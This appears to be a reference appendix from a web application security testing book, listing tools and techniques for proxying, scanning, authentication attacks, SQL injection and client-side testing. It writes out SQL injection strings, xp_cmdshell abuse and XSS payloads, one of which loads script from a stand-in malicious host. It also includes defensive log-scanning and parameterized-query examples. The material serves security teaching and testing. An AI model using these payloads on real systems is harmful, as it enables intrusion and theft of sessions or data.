We've discussed numerous tools and techniques in this book for assessing the security of web applications. This appendix summarizes the most important of these in an abbreviated format designed for use in the field. It is structured around the web hacking methodology that comprises the chapters of this book.
Web Browsers and Open Proxies

| Tool | Resource |
| --- | --- |
| Internet Explorer | http://www.microsoft.com/windows/ie/ |
| Firefox | http://www.mozilla.com/firefox/ |
| Open HTTP/S Proxies | http://www.publicproxyservers.com/ |

IE Extensions for HTTP/S Analysis

| Tool | Resource |
| --- | --- |
| TamperIE | http://www.bayden.com/ |
| IEWatch | http://www.iewatch.com |
| IE Headers | http://www.blunck.info/iehttpheaders.html |
| IE Developer Toolbar | Search http://www.microsoft.com |
| IE 5 Powertoys for WebDevs | http://www.microsoft.com/windows/ie/previous/webaccess/webdevaccess.mspx |

Firefox Extensions for HTTP/S Analysis

| Tool | Resource |
| --- | --- |
| LiveHTTP Headers | http://livehttpheaders.mozdev.org/ |
| Tamper Data for Firefox | http://tamperdata.mozdev.org |
| Modify Headers | http://modifyheaders.mozdev.org |
| Web Developer Extension for Firefox | http://chrispederick.com/work/webdeveloper/ |

HTTP/S Proxy Tools

| Tool | Resource |
| --- | --- |
| Burp Intruder | http://portswigger.net/intruder/ |
| Fiddler HTTP Debugging Proxy | http://www.fiddlertool.com |
| OWASP WebScarab | http://www.owasp.org |
| Paros Proxy | http://www.parosproxy.org |
| Watchfire PowerTools | http://www.watchfire.com/securityzone/product/powertools.aspx |

Sample Web Applications for Security Testing

| Tool | Resource |
| --- | --- |
| OWASP/Foundstone SiteGenerator | http://owasp.net/forums/thread/428.aspx |
| OWASP WebGoat | http://www.owasp.org/software/webgoat.html |
| Foundstone Hacme Bank | http://www.foundstone.com/resources/proddesc/hacmebank.htm |
| Foundstone Hacme Books | http://www.foundstone.com/resources/proddesc/hacmebooks.htm |

Command-line Tools

| Tool | Resource |
| --- | --- |
| curl | http://curl.haxx.se/ |
| Netcat | http://www.securityfocus.com/tools |
| Sslproxy | http://www.obdev.at/products/ssl-proxy/ |
| OpenSSL | http://www.openssl.org/ |
| Stunnel | http://www.stunnel.org/ |

Crawling Tools

| Tool | Resource |
| --- | --- |
| Offline Explorer Pro | http://www.metaproducts.com/ |
| Lynx | http://lynx.browser.org/ |
| Wget | http://www.gnu.org/directory/wget.html |
| Wget for Windows | http://www.interlog.com/~tcharron/wgetwin.html |
| Teleport Pro | http://www.tenmax.com/teleport/pro/home.htm |
| Black Widow | http://www.softbytelabs.com/BlackWidow/ |

Free Web Application Security Scanners

| Tool | Resource |
| --- | --- |
| Nikto | http://www.cirt.net/code/nikto.shtml |
| N-Stalker NStealth Free Edition | http://www.nstalker.com |
| Burp Suite | http://www.portswigger.net |
| Paros Proxy | http://www.parosproxy.org |
| OWASP WebScarab | http://www.owasp.org |

Commercial Web Application Security Scanners and Services

| Tool | Resource |
| --- | --- |
| Acunetix Enterprise Web Vulnerability Scanner | http://www.acunetix.com |
| Cenzic Hailstorm | http://www.cenzic.com |
| Ecyware GreenBlue Inspector | http://www.ecyware.com |
| Syhunt Sandcat Suite | http://www.syhunt.com |
| SPI Dynamics WebInspect | http://www.spidynamics.com |
| Watchfire AppScan | http://www.watchfire.com |
| NTObjectives NTOSpider | http://www.ntobjectives.com |
| Compuware DevPartner SecurityChecker | http://www.compuware.com |
| WhiteHat Security | http://www.whitehatsec.com |

Code Analysis Tools

| Tool | Resource |
| --- | --- |
| Jad, the Java decompiler | http://www.kpdus.com/jad.html |
| Inspector (formerly Bugscan) | http://www.hbgary.com |
| CodeAssure | http://www.securesw.com/products/ |
| DevInspect | http://www.spidynamics.com/ |
| Flawfinder | http://www.dwheeler.com/flawfinder/ |
| RATS | http://www.securesw.com/resources/tools.html |
| SPLINT | http://lclint.cs.virginia.edu/ |
| FXCop | http://www.gotdotnet.com/team/fxcop/ |
| ITS4 | http://www.cigital.com/ |
| PREfast | Available in Microsoft Visual Studio 2005 |
| Prexis | http://www.ouncelabs.com/ |
| Coverity | http://www.coverity.com |
| DevPartner SecurityChecker | http://www.compuware.com/ |

Binary Analysis

| Tool | Resource |
| --- | --- |
| Open Reverse Engineering Code | http://www.openrce.org |
| OllyDbg | http://www.ollydbg.de |
| OllyDbg Discussion Forum | http://community.reverse-engineering.net |
| IDA Pro | http://www.datarescue.com |

Profiling Tools and Techniques

| Tool/Technique | Resource |
| --- | --- |
| Httprint, the web server fingerprinting tool | http://net-square.com/httprint/ |
| SiteDigger | http://www.foundstone.com/resources/proddesc/sitedigger.htm |
| Wayback Machine | http://web.archive.org |
| Google search using `"+www.victim.+com"` | Identifying web application structure |
| Google search using `"related:www.victim.com"` | Related web sites |
| Google search using `"parent directory" robots.txt` | Finding the robots.txt file |
Authentication

| Task | Tool/Technique | Resource |
| --- | --- | --- |
| Local NTLM proxy | NTLM Authentication Proxy Server (APS) | http://www.geocities.com/rozmanov/ntlm/ |
| Automated password guessing | WebCracker | http://online.securityfocus.com/tools/706 |
| Automated password guessing | Brutus AET2 | http://www.hoobie.net/brutus/index.html |
| Automated password guessing | Hydra | http://www.thc.org |
| CAPTCHA decoder | PWNtcha | http://sam.zoy.org/pwntcha/ |
| Defeating SQL-based authentication | Using a known username, enter `FOO' OR 1 = 1 --` in the password field | NA |
Authorization/Session Management

| Task | Tool/Technique | Resource |
| --- | --- | --- |
| Cookie analysis | CookieSpy | http://camtech2000.net/Pages/CookieSpy.html |
| Base64 encode/decode | Perl MIME::Base64 module | http://search.cpan.org/search?mode=module&query=MIME%3A%3ABase64 |
| MD5 encoding | Perl Digest::MD5 module | http://search.cpan.org/search?mode=module&query=Digest%3A%3AMD5 |
| DES encryption/decryption | mcrypt | http://mcrypt.hellug.gr/ |
| DES encryption/decryption | Perl Crypt::DES module | http://search.cpan.org/search?mode=module&query=Crypt%3A%3ADES |
WebDAV Tools

| Tool | Resource |
| --- | --- |
| Cadaver, command-line WebDAV client for UNIX/Linux | http://www.webdav.org/cadaver/ |
| WebDAV client and server software implementations, listed by University of California, Irvine | http://www.ics.uci.edu/~ejw/authoring/implementation.html |

Web Services/SOAP Tools

| Tool | Resource |
| --- | --- |
| Web Service Studio | http://www.gotdotnet.com/team/tools/web_svc/default.aspx |
| SOAP Tools | http://soapclient.com/SoapTools.html |
| WSDigger | http://www.foundstone.com/resources/proddesc/wsdigger.htm |
Input Validation

| Task | Tool/Technique | Resource |
| --- | --- | --- |
| Cross-site scripting tests | XSS Cheat Sheet by RSnake | http://ha.ckers.org/xss.html |
| Buffer overflow testing | NTOMax | http://www.foundstone.com |
| Fuzzing | SPIKE Proxy | http://www.immunitysec.com |
| Fuzzing | SPI Fuzzer | http://www.spidynamics.com |
| Security library | DevInspect and SecureObjects | http://www.spidynamics.com |
Popular Characters to Test Input Validation

| Character | URL Encoding | Comments |
| --- | --- | --- |
| `'` | `%27` | The mighty tick mark (apostrophe), absolutely necessary for SQL injection; produces informational errors |
| `;` | `%3b` | Command separator, line terminator for scripts |
| [null] | `%00` | String terminator for file access, command separator |
| [return] | `%0a` | Command separator |
| `+` | `%2b` | Represents [space] in the URL; good in SQL injection |
| `<` | `%3c` | Opening HTML tag |
| `>` | `%3e` | Closing HTML tag |
| `%` | `%25` | Useful for double decode and search fields; signifies ASP, JSP tag |
| `?` | `%3f` | Signifies PHP tag |
| `=` | `%3d` | Place multiple equal signs in a URL parameter |
| `(` | `%28` | SQL injection |
| `)` | `%29` | SQL injection |
| [space] | `%20` | Necessary for longer scripts |
| `.` | `%2e` | Directory traversal, file access |
| `/` | `%2f` | Directory traversal |
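The character table above is written from the tester's side; the defender's counterpart is reviewing server logs for the same characters after URL decoding. The following Python script is an added example, not code from the book or from any tool it lists: it pulls the request target out of constructed Apache-style log lines (sample data only), percent-decodes each query value repeatedly so that the double-encoding trick noted for `%` is caught, and reports which of the table's characters appear. The character list and the reasons given for each are taken from the table; the log lines and the function names are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Characters from the "Popular Characters" table and why a reviewer cares.
SUSPICIOUS = {
    "'": "apostrophe (SQL injection probe)",
    ";": "semicolon (command separator)",
    "\x00": "null byte (string terminator)",
    "\n": "newline (command separator)",
    "<": "opening HTML tag",
    ">": "closing HTML tag",
    "(": "parenthesis (SQL injection)",
    "..": "dot-dot (directory traversal)",
}

# Constructed sample log lines in Apache common-log format; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2006:10:00:00 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2006:10:00:01 +0000] "GET /login?user=admin&pass=FOO%27+OR+1%3d1+-- HTTP/1.1" 200 128',
    '10.0.0.7 - - [01/Jan/2006:10:00:02 +0000] "GET /view?file=..%252f..%252fetc%252fpasswd HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Jan/2006:10:00:03 +0000] "GET /profile?name=%3cscript%3ealert(1)%3c/script%3e HTTP/1.1" 200 900',
]

# The request target sits between the method and the HTTP version.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_stages(value, max_rounds=2):
    """Percent-decode repeatedly and return every stage, stopping when stable.

    A value that still changes on the second round was double-encoded.
    """
    stages = [value]
    for _ in range(max_rounds):
        nxt = unquote_plus(stages[-1])   # also turns '+' into a space
        if nxt == stages[-1]:
            break
        stages.append(nxt)
    return stages


def inspect_target(target):
    """Return a sorted list of findings for one request target (path + query)."""
    findings = set()
    path, _, query = target.partition("?")
    values = [path]
    for part in query.split("&"):
        if part:
            values.append(part.partition("=")[2])   # value after the first '='
    for value in values:
        stages = decode_stages(value)
        if len(stages) > 2:
            findings.add("double URL encoding")
        decoded = stages[-1]
        for token, why in SUSPICIOUS.items():
            if token in decoded:
                findings.add(why)
    return sorted(findings)


def review_log(lines):
    """Map each 1-based line number that has findings to its list of findings."""
    report = {}
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        found = inspect_target(m.group(1))
        if found:
            report[n] = found
    return report


if __name__ == "__main__":
    for n, found in review_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(found)}")
```

Decoding is done on the raw query string rather than with `parse_qsl`, because `parse_qsl` decodes one level for you and would hide the difference between `%27` and `%2527`. A table-driven check like this is deliberately noisy (a parenthesis in a script tag is flagged as a SQL character too); its job is to shortlist requests for a human, not to block them.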
SQL Formatting Characters

| Character | Description |
| --- | --- |
| `'` | Terminates a statement. |
| `--` | Single-line comment. Ignores the remainder of the statement. |
| `+` | Space. Required to correctly format a statement. |
| `,@variable` | Appends variables. Helps identify stored procedures. |
| `?Param1=foo&Param1=bar` | Creates "Param=foo, bar". Helps identify stored procedures. |
| `@@variable` | Call an internal server variable. |
|  | Returns an ODBC error but does not target data. |
| `SET` | Assigns variables. Useful for multiline SQL statements. |
| `%` | A wild card that matches any string of zero or more characters. |
Basic SQL Injection Syntax

| Query Syntax | Result |
| --- | --- |
| `OR 1=1` | Creates a true condition for bypassing logic checks. |
| `UNION ALL SELECT field FROM table WHERE condition` | Retrieves all rows from a table if condition is true (e.g., `1=1`). |
| `INSERT INTO Users VALUES('neo', 'trinity')` | Can bypass authentication. |
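Why `OR 1=1` works, and what stops it, is easiest to see with the same login check written two ways. The Python below is an added example, not code from the book: it builds a throwaway in-memory SQLite database holding the `neo`/`trinity` row from the table above, then runs the password value from the Authentication table (`FOO' OR 1 = 1 --`) through a query assembled by string concatenation and through the same query with bound parameters. The function names, the table layout and the use of SQLite are assumptions of this example; the behaviour (comment syntax `--`, string literals in single quotes) matches the formatting-character table.

```python
import sqlite3


def make_db():
    """Create a throwaway database with one constructed user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('neo', 'trinity')")
    return conn


def login_concatenated(conn, username, password):
    """Vulnerable: untrusted input is spliced directly into the SQL text.

    With password "FOO' OR 1 = 1 --" the statement becomes
      ... AND password = 'FOO' OR 1 = 1 --'
    so the closing quote is commented out and OR 1 = 1 makes the WHERE
    clause true for every row.
    """
    sql = ("SELECT COUNT(*) FROM Users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    """Hardened: the driver binds the values, so quotes and comments stay data."""
    sql = "SELECT COUNT(*) FROM Users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def compare(username, password):
    """Run both versions on a fresh database and report each verdict."""
    conn = make_db()
    try:
        return {
            "concatenated": login_concatenated(conn, username, password),
            "parameterized": login_parameterized(conn, username, password),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for pw in ("trinity", "FOO' OR 1 = 1 --", "wrong"):
        print(repr(pw), compare("neo", pw))
```

The parameterized version does not sanitize anything; it simply never lets the password string become part of the statement text, which is why the apostrophe and the `--` comment lose their meaning. The same separation is what makes `UNION` and `INSERT` payloads from the table above inert against a bound-parameter query.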
Useful MS SQL Server Variables

| Variable |
| --- |
| `@@language` |
| `@@microsoftversion` |
| `@@servername` |
| `@@servicename` |
| `@@version` |
Stored Procedures for Enumerating SQL Server

| Stored Procedure | Description |
| --- | --- |
| `sp_columns <table>` | Most importantly, returns the column names of a table. |
| `sp_configure [name]` | Returns internal database settings. Specify a particular setting to retrieve just that value, for example `sp_configure 'remote query timeout (s)'`. |
| `sp_dboption` | Views (or sets) user-configurable database options. |
| `sp_depends <object>` | Lists the tables associated with a stored procedure. |
| `sp_helptext <object>` | Describes the object. This is more useful for identifying areas where you can execute stored procedures. It rarely executes successfully. |
| `sp_helpextendedproc` | Lists all extended stored procedures. |
| `sp_spaceused [object]` | With no parameters, returns the database name(s), size, and unallocated space. If an object is specified, it will describe the rows and other information as appropriate. |
| `sp_who2 [username]` (and `sp_who`) | Displays usernames, the host from which they've connected, the application used to connect to the database, the current command executed in the database, and several other pieces of information. Both procedures accept an optional username. This is an excellent way to enumerate a SQL database's users as opposed to application users. |
MS SQL Parameterized Extended Stored Procedures

| Extended Stored Procedure | Description |
| --- | --- |
| `xp_cmdshell <command>` | The equivalent of cmd.exe, in other words full command-line access to the database server. Cmd.exe is assumed, so you would only need to enter `dir` to obtain a directory listing. The default current directory is `%SYSTEMROOT%\System32`. |
| `xp_regread <rootkey>, <key>, <value>` | Reads a registry value. |
| `xp_reg*` | There are several other registry-related procedures. Reading a value is the most useful. |
| `xp_servicecontrol <action>, <service>` | Starts or stops a Windows service. |
| `xp_terminate_process <PID>` | Kills a process based on its process ID. |
MS SQL Nonparameterized Extended Stored Procedures

| Extended Stored Procedure | Description |
| --- | --- |
| `xp_loginconfig` | Displays login information, particularly the login mode (mixed, etc.) and default login. |
| `xp_logininfo` | Shows currently logged-in accounts. Only applies to NTLM accounts. |
| `xp_msver` | Lists SQL version and platform information. |
| `xp_enumdsn` | Enumerates ODBC data sources. |
| `xp_enumgroups` | Enumerates Windows groups. |
| `xp_ntsec_enumdomains` | Enumerates domains present on the network. |
SQL System Table Objects

| System Table Object | Description |
| --- | --- |
| `syscolumns` | All column names and stored procedures for the current database, not just the master. |
| `sysobjects` | Every object (such as stored procedures) in the database. |
| `sysusers` | All of the users who can manipulate the database. |
| `sysfiles` | The filename and path for the current database and its log file. |
| `systypes` | Data types defined by SQL or new types defined by users. |

Default SQL Master Database Tables

| Master Database Table | Description |
| --- | --- |
| `sysconfigures` | Current database configuration settings. |
| `sysdevices` | Enumerates devices used for databases, logs, and temporary files. |
| `syslogins` | Enumerates user information for each user permitted to access the database. |
| `sysremotelogins` | Enumerates user information for each user permitted to remotely access the database or its stored procedures. |
| `sysservers` | Lists all peers that the server can access as an OLE database server. |
Common Ports Used for Web Management

| Port | Typical Service |
| --- | --- |
| 21 | FTP for file transfer |
| 22 | Secure Shell (SSH) for remote management |
| 23 | Telnet for remote management |
| 80 | World Wide Web standard port |
| 81 | Alternate WWW |
| 88 | Alternate WWW (also Kerberos) |
| 443 | HTTPS |
| 900 | IBM WebSphere administration client |
| 2301 | Compaq Insight Manager |
| 2381 | Compaq Insight Manager over HTTPS |
| 4242 | Microsoft Application Center Management |
| 7001 | BEA WebLogic administration |
| 7002 | BEA WebLogic administration over SSL |
| 7070 | Sun Java Web Server over SSL |
| 8000 | Alternate web server or web cache |
| 8001 | Alternate web server or management |
| 8005 | Apache Tomcat |
| 8080 | Alternate web server, or Squid cache control (cachemgr.cgi), or Sun Java Web Server |
| 8100 | Allaire JRun |
| 88x0 | Ports 8810, 8820, 8830, and so on usually belong to ATG Dynamo |
| 8888 | Alternate web server |
| 9090 | Sun Java Web Server admin module |
| 10000 | Netscape Administrator interface (default) |
Denial of Service

| Resource | URL |
| --- | --- |
| DDoS attacks/tools compiled by David Dittrich | http://staff.washington.edu/dittrich/misc/ddos/ |
| DoS tools and techniques | http://www.antiserver.it/Denial-Of-Service/ |
Client-side Analysis

| Task | Tool/Technique | Resource |
| --- | --- | --- |
| Cross-site scripting testing | ScreamingCSS | http://www.devitry.com/screamingCSS.html |
| Cross-site scripting testing | Injecting an IFRAME | `<iframe src="[link_to_executable_content]"></iframe>` |
| Cross-site scripting testing | Injecting a META REFRESH | `<META HTTP-EQUIV=Refresh CONTENT="1; URL=http://redirect_to_here.com/">` |
| Cross-site scripting testing | Injecting script elements | `<script>document.write(document.cookie)</script>`, `<script>alert('Salut!')</script>`, `<script src="http://www.malicious-host.foo/badscript.js"></script>` |
| HTML injection | Injecting script using a style attribute | `<div style="background:url('javascript:alert(1)')">` |